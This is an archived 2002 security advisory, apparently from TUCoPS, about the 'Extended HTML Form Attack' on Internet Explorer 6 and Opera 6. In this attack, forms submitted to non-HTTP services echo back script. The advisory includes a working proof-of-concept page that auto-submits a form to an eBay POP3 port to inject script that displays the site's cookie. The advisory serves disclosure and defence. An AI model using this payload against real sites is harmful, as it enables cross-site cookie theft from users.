TUCoPS :: Browsers :: expl5079.htm

Internet Explorer (and Opera) vulnerable to the Extended HTML Form Attack
8th Feb 2002 [SBWID-5079]
COMMAND

	IE (and Opera) vulnerable to the Extended HTML Form Attack

SYSTEMS AFFECTED

	 Internet Explorer 6 and older versions

	 Opera 6.0 and older versions

	

PROBLEM

	In obscure [http://www.eyeonsecurity.net] advisory :
	

	Many web browsers such as Internet Explorer allow forms to be  submitted
	to non-HTTP services. Some non-HTTP services echo back  the  information
	sent, and the web browser renders the echo as an HTML  page,  regardless
	of the protocol behind the service.
	

	A malicious user can create a form which  is  submitted  by  the  victim
	(automatically  using  Active  Scripting  or   manually   using   Social
	Engineering). This form can  cause  a  non-HTTP  service  to  echo  back
	JavaScript commands which in turn allow the malicious user to steal  the
	cookie for that domain. There are more uses for this attack, other  than
	just stealing cookies.
	

	More on this :
	

	http://eyeonsecurity.net/papers/ - Extended HTML Form Attack

	

	

	 Sample exploit [http://eyeonsecurity.net/advisories/showMyCookie.html] :

	

	<html>

	<head><title>Extended HTML form attack demo- obscure</title></head>

	<body>

	Legal Notice: <br>

	This Advisory and Demonstration is Copyright (c) 2001 Obscure. You may distribute it unmodified. You may not modify it and distribute it or distribute parts of it without the author\'s written permission. 

	<p>

	Disclaimer: <br>

	The opinions expressed in this advisory and program are my own and not of any company. 

	The usual standard disclaimer applies, especially the fact that Obscure 

	is not liable for any damages caused by direct or  indirect use of the information or functionality provided by this advisory or program. 

	Obscure, bears no responsibility for content or misuse of this advisory or program or any derivatives thereof. 

	<p>

	if you have JavaScript on you do not need to click on submit. This example will only show your cookie for Ebay.com.

	<script>

	window.open(\"http://www.ebay.com\",\"w\");

	setTimeout(\"form1.submit()\",300);

	</script>

	<form name=\"form1\" method=\"post\" action=\"http://thompson.ebay.com:110/\" enctype=\"multipart/form-data\">

	  <textarea name=\"eostest\">

	user <script>alert(document.cookie)</script>

	quit

	  </textarea>

	  <input type=\"submit\" value=\"Submit\">

	</form>

	</body>

	</html>

	

SOLUTION

	None yet.

TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2025 AOH